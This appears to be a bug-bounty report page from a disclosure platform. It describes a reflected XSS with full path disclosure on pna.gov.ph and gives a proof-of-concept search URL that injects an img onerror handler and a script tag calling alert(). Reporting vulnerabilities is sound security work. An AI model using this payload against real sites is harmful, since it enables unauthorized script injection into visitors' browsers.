Chat with BLT Bot

We reply immediately

Loading...

Reflected XSS with full path disclosure in pna.gov.ph !

https://www.pna.gov.ph/articles/search?q=xdddd&c=5%22--%3E%3Cimg%20src=/%20onerror=alert(1)%3E%3Cscript%3Ealert(%27XSS!%20Bounty%20Please!!%27);%3C/script%3E


Tweet   GitHub Link  

Screenshots:

Event ID: 1154

User Profile Logo
Total Points = 320
User Profile Logo
febinrev
Total Points = 320
Bug Type: Security
Status: open
Added on: Aug. 29, 2020, 6:44 a.m.
Submitted: Independently
Domain Logo
Reported on pna.gov.ph
Issues Reported: 1
Browser Image
Browser Version: 68.0
Operating System: Linux
OS Version: Unknown

Comments (0)

To comment, please sign in.
QR Code

v1.5